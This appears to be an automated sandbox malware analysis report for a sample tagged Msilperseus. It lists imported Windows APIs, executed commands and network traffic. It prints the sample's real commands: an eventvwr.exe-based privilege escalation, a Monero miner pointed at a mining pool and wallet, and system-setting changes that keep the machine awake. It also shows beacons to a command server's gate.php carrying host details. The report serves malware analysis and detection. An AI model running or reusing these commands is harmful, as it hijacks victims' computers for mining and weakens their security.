oleaut32.dll.#8
ole32.dll.CoSwitchCallContext
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
ntmarta.dll.GetMartaExtensionInterface
wmi.dll.WmiQueryAllDataW
wmi.dll.WmiQuerySingleInstanceW
wmi.dll.WmiSetSingleItemW
wmi.dll.WmiSetSingleInstanceW
wmi.dll.WmiExecuteMethodW
wmi.dll.WmiNotificationRegistrationW
wmi.dll.WmiMofEnumerateResourcesW
wmi.dll.WmiFileHandleToInstanceNameW
wmi.dll.WmiDevInstToInstanceNameW
wmi.dll.WmiQueryGuidInformation
wmi.dll.WmiOpenBlock
wmi.dll.WmiCloseBlock
wmi.dll.WmiFreeBuffer
wmi.dll.WmiEnumerateGuids
oleaut32.dll.#15
oleaut32.dll.#23
oleaut32.dll.#24
oleaut32.dll.#16
oleaut32.dll.#26
devobj.dll.DevObjCreateDeviceInfoList
devobj.dll.DevObjGetClassDevs
devobj.dll.DevObjEnumDeviceInterfaces
devobj.dll.DevObjGetDeviceInterfaceDetail
cfgmgr32.dll.CM_Connect_MachineA
cfgmgr32.dll.CM_Disconnect_Machine
cfgmgr32.dll.CM_Locate_DevNodeW
cfgmgr32.dll.CM_Get_DevNode_Registry_PropertyW
cfgmgr32.dll.CM_Get_Child
cfgmgr32.dll.CM_Get_Sibling
cfgmgr32.dll.CM_Get_DevNode_Status
cfgmgr32.dll.CM_Get_First_Log_Conf
cfgmgr32.dll.CM_Get_Next_Res_Des
cfgmgr32.dll.CM_Get_Res_Des_Data
cfgmgr32.dll.CM_Get_Res_Des_Data_Size
cfgmgr32.dll.CM_Free_Log_Conf_Handle
cfgmgr32.dll.CM_Free_Res_Des_Handle
cfgmgr32.dll.CM_Get_Device_IDA
cfgmgr32.dll.CM_Get_Device_ID_Size
cfgmgr32.dll.CM_Get_Parent
oleaut32.dll.#40
devobj.dll.DevObjDestroyDeviceInfoList
devobj.dll.DevObjEnumDeviceInfo
setupapi.dll.CM_Open_DevNode_Key_Ex
devobj.dll.DevObjGetDeviceProperty
user32.dll.GetSystemMetrics
user32.dll.MonitorFromWindow
user32.dll.MonitorFromRect
user32.dll.MonitorFromPoint
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesW
user32.dll.GetMonitorInfoW
dxgi.dll.DXGIReportAdapterConfiguration
setupapi.dll.SetupDiGetClassDevsW
setupapi.dll.SetupDiEnumDeviceInterfaces
setupapi.dll.SetupDiGetDeviceInterfaceDetailW
setupapi.dll.SetupDiDestroyDeviceInfoList
gdi32.dll.D3DKMTOpenAdapterFromDeviceName
gdi32.dll.D3DKMTQueryAdapterInfo
gdi32.dll.D3DKMTGetDisplayModeList
gdi32.dll.D3DKMTCloseAdapter
wintrust.dll.WinVerifyTrust
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.ConvertLengthToIpv4Mask
iphlpapi.dll.FreeMibTable
advapi32.dll.RegEnumKeyW
iphlpapi.dll.GetAdapterIndex
dnsapi.dll.DnsQueryConfigAllocEx
iphlpapi.dll.GetCurrentThreadCompartmentId
dnsapi.dll.DnsFreeConfigStructure
dnsapi.dll.DnsQueryConfigDword
ole32.dll.OleInitialize
ole32.dll.CreateBindCtx
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PSPropertyBag_WriteDWORD
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
comctl32.dll.#236
ole32.dll.CoGetMalloc
propsys.dll.PSPropertyBag_ReadDWORD
comctl32.dll.#320
ole32.dll.StringFromGUID2
comctl32.dll.#324
comctl32.dll.#323
propsys.dll.PSPropertyBag_ReadBSTR
propsys.dll.PSPropertyBag_ReadStrAlloc
shell32.dll.#102
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
advapi32.dll.SetSecurityDescriptorDacl
advapi32.dll.IsTextUnicode
comctl32.dll.#328
comctl32.dll.#334
comctl32.dll.#338
comctl32.dll.#339
sechost.dll.ConvertSidToStringSidW
profapi.dll.#104
propsys.dll.#430
advapi32.dll.RegGetValueW
ole32.dll.CoTaskMemRealloc
ole32.dll.CoAllowSetForegroundWindow
kernel32.dll.InitializeSRWLock
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.AcquireSRWLockShared
kernel32.dll.ReleaseSRWLockExclusive
kernel32.dll.ReleaseSRWLockShared
advapi32.dll.SaferGetPolicyInformation
ntdll.dll.RtlDllShutdownInProgress
comctl32.dll.#329
ole32.dll.OleUninitialize
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
kernel32.dll.DeleteFileW
advapi32.dll.GetKernelObjectSecurity
advapi32.dll.SetKernelObjectSecurity
kernel32.dll.AddVectoredExceptionHandler
kernel32.dll.AssignProcessToJobObject
kernel32.dll.CancelIo
kernel32.dll.ConnectNamedPipe
kernel32.dll.CreateDirectoryW
kernel32.dll.CreateEventA
kernel32.dll.CreateFileA
kernel32.dll.CreateHardLinkW
kernel32.dll.CreateIoCompletionPort
kernel32.dll.CreateJobObjectW
kernel32.dll.CreateNamedPipeA
kernel32.dll.CreateNamedPipeW
kernel32.dll.CreateProcessW
kernel32.dll.CreateSemaphoreA
kernel32.dll.CreateSemaphoreW
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.DeleteCriticalSection
kernel32.dll.DeviceIoControl
kernel32.dll.EnterCriticalSection
kernel32.dll.FileTimeToSystemTime
kernel32.dll.FillConsoleOutputAttribute
kernel32.dll.FillConsoleOutputCharacterA
kernel32.dll.FillConsoleOutputCharacterW
kernel32.dll.FlushFileBuffers
kernel32.dll.FormatMessageA
kernel32.dll.FreeConsole
kernel32.dll.GetConsoleCursorInfo
kernel32.dll.GetConsoleMode
kernel32.dll.GetConsoleScreenBufferInfo
kernel32.dll.GetConsoleTitleW
kernel32.dll.GetConsoleWindow
kernel32.dll.GetCurrentThread
kernel32.dll.GetCurrentThreadId
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileAttributesW
kernel32.dll.GetFileInformationByHandle
kernel32.dll.GetHandleInformation
kernel32.dll.GetLongPathNameW
kernel32.dll.GetModuleFileNameW
kernel32.dll.GetModuleHandleA
kernel32.dll.GetModuleHandleW
kernel32.dll.GetNamedPipeHandleStateA
kernel32.dll.GetNumberOfConsoleInputEvents
kernel32.dll.GetProcessAffinityMask
kernel32.dll.GetQueuedCompletionStatus
kernel32.dll.GetShortPathNameW
kernel32.dll.GetStartupInfoA
kernel32.dll.GetStartupInfoW
kernel32.dll.GetSystemTimeAdjustment
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.GetThreadContext
kernel32.dll.GetThreadPriority
kernel32.dll.GetThreadTimes
kernel32.dll.GetTickCount
kernel32.dll.GetTimeZoneInformation
kernel32.dll.InitializeCriticalSection
kernel32.dll.IsDBCSLeadByteEx
kernel32.dll.LCMapStringW
kernel32.dll.LeaveCriticalSection
kernel32.dll.MoveFileExW
kernel32.dll.MultiByteToWideChar
kernel32.dll.OutputDebugStringA
kernel32.dll.PeekNamedPipe
kernel32.dll.PostQueuedCompletionStatus
kernel32.dll.Process32First
kernel32.dll.Process32Next
kernel32.dll.QueryPerformanceCounter
kernel32.dll.QueryPerformanceFrequency
kernel32.dll.QueueUserWorkItem
kernel32.dll.RaiseException
kernel32.dll.ReadConsoleInputW
kernel32.dll.ReadConsoleW
kernel32.dll.ReadDirectoryChangesW
kernel32.dll.RegisterWaitForSingleObject
kernel32.dll.ReleaseSemaphore
kernel32.dll.RemoveDirectoryW
kernel32.dll.RemoveVectoredExceptionHandler
kernel32.dll.ResumeThread
kernel32.dll.RtlAddFunctionTable
kernel32.dll.RtlCaptureContext
kernel32.dll.RtlLookupFunctionEntry
kernel32.dll.RtlUnwindEx
kernel32.dll.RtlVirtualUnwind
kernel32.dll.SetConsoleCtrlHandler
kernel32.dll.SetConsoleCursorInfo
kernel32.dll.SetConsoleCursorPosition
kernel32.dll.SetConsoleMode
kernel32.dll.SetConsoleTextAttribute
kernel32.dll.SetConsoleTitleW
kernel32.dll.SetCurrentDirectoryW
kernel32.dll.SetEnvironmentVariableW
kernel32.dll.SetFileTime
kernel32.dll.SetHandleInformation
kernel32.dll.SetInformationJobObject
kernel32.dll.SetLastError
kernel32.dll.SetNamedPipeHandleState
kernel32.dll.SetProcessAffinityMask
kernel32.dll.SetSystemTime
kernel32.dll.SetThreadAffinityMask
kernel32.dll.SetThreadContext
kernel32.dll.SetThreadPriority
kernel32.dll.SetUnhandledExceptionFilter
kernel32.dll.Sleep
kernel32.dll.SuspendThread
kernel32.dll.SwitchToThread
kernel32.dll.TerminateProcess
kernel32.dll.TlsAlloc
kernel32.dll.TlsFree
kernel32.dll.TlsGetValue
kernel32.dll.TlsSetValue
kernel32.dll.TryEnterCriticalSection
kernel32.dll.UnhandledExceptionFilter
kernel32.dll.UnregisterWait
kernel32.dll.UnregisterWaitEx
kernel32.dll.VerSetConditionMask
kernel32.dll.VerifyVersionInfoA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualFree
kernel32.dll.VirtualProtect
kernel32.dll.WaitForMultipleObjects
kernel32.dll.WaitNamedPipeW
kernel32.dll.WideCharToMultiByte
kernel32.dll.WriteConsoleInputW
kernel32.dll.WriteConsoleW
kernel32.dll.__C_specific_handler
advapi32.dll.CryptGenRandom
advapi32.dll.LsaAddAccountRights
advapi32.dll.LsaClose
advapi32.dll.LsaOpenPolicy
msvcrt.dll.___lc_codepage_func
msvcrt.dll.__argv
msvcrt.dll.__dllonexit
msvcrt.dll.__doserrno
msvcrt.dll.__getmainargs
msvcrt.dll.__initenv
msvcrt.dll.__iob_func
msvcrt.dll.__lconv_init
msvcrt.dll.__mb_cur_max
msvcrt.dll.__set_app_type
msvcrt.dll.__setusermatherr
msvcrt.dll._acmdln
msvcrt.dll._amsg_exit
msvcrt.dll._beginthreadex
msvcrt.dll._cexit
msvcrt.dll._close
msvcrt.dll._endthreadex
msvcrt.dll._errno
msvcrt.dll._exit
msvcrt.dll._fileno
msvcrt.dll._fmode
msvcrt.dll._get_osfhandle
msvcrt.dll._initterm
msvcrt.dll._isatty
msvcrt.dll._localtime64
msvcrt.dll._lock
msvcrt.dll._lseeki64
msvcrt.dll._onexit
msvcrt.dll._open_osfhandle
msvcrt.dll._read
msvcrt.dll._setjmp
msvcrt.dll._snprintf
msvcrt.dll._snwprintf
msvcrt.dll._strdup
msvcrt.dll._strnicmp
msvcrt.dll._time64
msvcrt.dll._ultoa
msvcrt.dll._umask
msvcrt.dll._unlock
msvcrt.dll._vscprintf
msvcrt.dll._vsnprintf
msvcrt.dll._wchmod
msvcrt.dll._wcsdup
msvcrt.dll._wcsnicmp
msvcrt.dll._wcsrev
msvcrt.dll._wmkdir
msvcrt.dll._write
msvcrt.dll._wrmdir
msvcrt.dll.abort
msvcrt.dll.atoi
msvcrt.dll.calloc
msvcrt.dll.exit
msvcrt.dll.fclose
msvcrt.dll.fflush
msvcrt.dll.fgetc
msvcrt.dll.fopen
msvcrt.dll.fprintf
msvcrt.dll.fputc
msvcrt.dll.fputs
msvcrt.dll.free
msvcrt.dll.fwprintf
msvcrt.dll.fwrite
msvcrt.dll.getenv
msvcrt.dll.islower
msvcrt.dll.isspace
msvcrt.dll.isupper
msvcrt.dll.localeconv
msvcrt.dll.longjmp
msvcrt.dll.malloc
msvcrt.dll.memchr
msvcrt.dll.memcmp
msvcrt.dll.memcpy
msvcrt.dll.memmove
msvcrt.dll.memset
msvcrt.dll.printf
msvcrt.dll.qsort
msvcrt.dll.raise
msvcrt.dll.realloc
msvcrt.dll.signal
msvcrt.dll.sprintf
msvcrt.dll.strchr
msvcrt.dll.strcmp
msvcrt.dll.strcpy
msvcrt.dll.strerror
msvcrt.dll.strlen
msvcrt.dll.strncmp
msvcrt.dll.strncpy
msvcrt.dll.strspn
msvcrt.dll.strstr
msvcrt.dll.strtol
msvcrt.dll.vfprintf
msvcrt.dll.wcschr
msvcrt.dll.wcscpy
msvcrt.dll.wcslen
msvcrt.dll.wcsncmp
msvcrt.dll.wcsncpy
msvcrt.dll.wcspbrk
msvcrt.dll.wcsrchr
msvcrt.dll.wcstombs
psapi.dll.GetProcessMemoryInfo
user32.dll.MessageBoxW
user32.dll.ShowWindow
userenv.dll.GetUserProfileDirectoryW
ws2_32.dll.FreeAddrInfoW
ws2_32.dll.GetAddrInfoW
ws2_32.dll.WSADuplicateSocketW
ws2_32.dll.WSAGetLastError
ws2_32.dll.WSARecv
ws2_32.dll.WSARecvFrom
ws2_32.dll.WSASend
ws2_32.dll.WSASendTo
ws2_32.dll.WSASetLastError
ws2_32.dll.bind
ws2_32.dll.getpeername
ws2_32.dll.getsockname
ws2_32.dll.getsockopt
ws2_32.dll.htonl
ws2_32.dll.htons
ws2_32.dll.listen
ws2_32.dll.select
ws2_32.dll.socket
ntdll.dll.RtlGetVersion
ntdll.dll.RtlNtStatusToDosError
ntdll.dll.NtDeviceIoControlFile
ntdll.dll.NtQueryInformationFile
ntdll.dll.NtSetInformationFile
ntdll.dll.NtQueryVolumeInformationFile
ntdll.dll.NtQueryDirectoryFile
kernel32.dll.GetQueuedCompletionStatusEx
kernel32.dll.SetFileCompletionNotificationModes
kernel32.dll.CancelIoEx
kernel32.dll.InitializeConditionVariable
kernel32.dll.SleepConditionVariableCS
kernel32.dll.SleepConditionVariableSRW
kernel32.dll.WakeAllConditionVariable
kernel32.dll.WakeConditionVariable
kernel32.dll.CancelSynchronousIo
kernel32.dll.GetFinalPathNameByHandleW
samlib.dll.SamQueryInformationDomain
samlib.dll.SamSetInformationDomain

Execute Commands

eventvwr.exe 
"cmd.exe" /c ""C:\Users\Seven01\AppData\Roaming\mcrserver.exe" "C:\Users\Seven01\AppData\Local\Temp\trickkk.exe""
C:\Windows\sysnative\eventvwr.msc 
"C:\Users\Seven01\AppData\Roaming\mcrserver.exe"  "C:\Users\Seven01\AppData\Local\Temp\trickkk.exe"
C:\Windows\sysnative\cmd.exe /C net accounts /forcelogoff:no
C:\Windows\sysnative\cmd.exe /C net accounts /maxpwage:unlimited
C:\Users\Seven01\AppData\Roaming\MicrosoftViewer.exe -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 494ZEpn5QhTK5Wr9zJJJVkRrL8oEk3dXGgJA5jNB59kuFU523aGz7Eo1wDJ1gcv3UJBSFQxLZsuKHUhW6qhuHie4MyApcso.
  
    INetSim default HTML page
  
  
    

This is the default HTML page for INetSim HTTP server fake mode-

This file is an HTML document-

-p x -k -t 1 C:\Windows\sysnative\cmd.exe /C powercfg /x /standby-timeout-ac 0 C:\Windows\sysnative\cmd.exe /C reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f net accounts /forcelogoff:no net accounts /maxpwage:unlimited powercfg /x /standby-timeout-ac 0 C:\Windows\system32\net1 accounts /forcelogoff:no C:\Windows\system32\net1 accounts /maxpwage:unlimited reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01_64 Seven01_64 VirtualBox 2017-10-23 13:45:53 2017-10-23 13:48:48 175

3 HTTP Request(s) detected

http://api.ipify.org/?
  • Hostname: api.ipify.org
  • IP Address: 23.23.170.235
  • Port: 80
  • Count: 2

GET /? HTTP/1.1
Host: api.ipify.org
Connection: Keep-Alive

http://45.77.62.98/gate.php?hard_id=%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Ctitle%3EINetSim%20default%20HTML%20page%3C/title%3E%0A%20%20%3C/head%3E%0A%20%20%3Cbody%3E%0A%20%20%20%20%3Cp%3E%3C/p%3E%0A%20%20%20%20%3Cp%20align=%22center%22%3EThis%20is%20the%20default%20HTML%20page%20for%20INetSim%20HTTP%20server%20fake%20mode-%3C/p%3E%0A%20%20%20%20%3Cp%20align=%22center%22%3EThis%20file%20is%20an%20HTML%20document-%3C/p%3E%0A%20%20%3C/body%3E%0A%3C/html%3E%0A&64=1&video_card=null&cpu_cores=2
  • Hostname: 45.77.62.98
  • IP Address:
  • Port: 80
  • Count: 8

GET /gate.php?hard_id=%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Ctitle%3EINetSim%20default%20HTML%20page%3C/title%3E%0A%20%20%3C/head%3E%0A%20%20%3Cbody%3E%0A%20%20%20%20%3Cp%3E%3C/p%3E%0A%20%20%20%20%3Cp%20align=%22center%22%3EThis%20is%20the%20default%20HTML%20page%20for%20INetSim%20HTTP%20server%20fake%20mode-%3C/p%3E%0A%20%20%20%20%3Cp%20align=%22center%22%3EThis%20file%20is%20an%20HTML%20document-%3C/p%3E%0A%20%20%3C/body%3E%0A%3C/html%3E%0A&64=1&video_card=null&cpu_cores=2 HTTP/1.1
Host: 45.77.62.98
Connection: Keep-Alive

http://45.77.62.98/gate.php?hard_id=%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Ctitle%3EINetSim%20default%20HTML%20page%3C/title%3E%0A%20%20%3C/head%3E%0A%20%20%3Cbody%3E%0A%20%20%20%20%3Cp%3E%3C/p%3E%0A%20%20%20%20%3Cp%20align=%22center%22%3EThis%20is%20the%20default%20HTML%20page%20for%20INetSim%20HTTP%20server%20fake%20mode-%3C/p%3E%0A%20%20%20%20%3Cp%20align=%22center%22%3EThis%20file%20is%20an%20HTML%20document-%3C/p%3E%0A%20%20%3C/body%3E%0A%3C/html%3E%0A&64=1&video_card=null&cpu_cores=2
  • Hostname: 45.77.62.98
  • IP Address:
  • Port: 80
  • Count: 5

GET /gate.php?hard_id=%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Ctitle%3EINetSim%20default%20HTML%20page%3C/title%3E%0A%20%20%3C/head%3E%0A%20%20%3Cbody%3E%0A%20%20%20%20%3Cp%3E%3C/p%3E%0A%20%20%20%20%3Cp%20align=%22center%22%3EThis%20is%20the%20default%20HTML%20page%20for%20INetSim%20HTTP%20server%20fake%20mode-%3C/p%3E%0A%20%20%20%20%3Cp%20align=%22center%22%3EThis%20file%20is%20an%20HTML%20document-%3C/p%3E%0A%20%20%3C/body%3E%0A%3C/html%3E%0A&64=1&video_card=null&cpu_cores=2 HTTP/1.1
Host: 45.77.62.98

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01_64 Seven01_64 VirtualBox 2017-10-23 13:45:53 2017-10-23 13:48:48 175

1 Host(s) detected

IP Address Hostname Reverse DNS
45.77.62.98 France 45.77.62.98.vultr.com.

Host(s) by Country

Hosts Country 1
1 France France

#infosec #automation

TheSystem Itself @ 2017-10-23 13:51:06

Detected family: #Msilperseus

TheSystem Itself @ 2017-10-23 13:58:06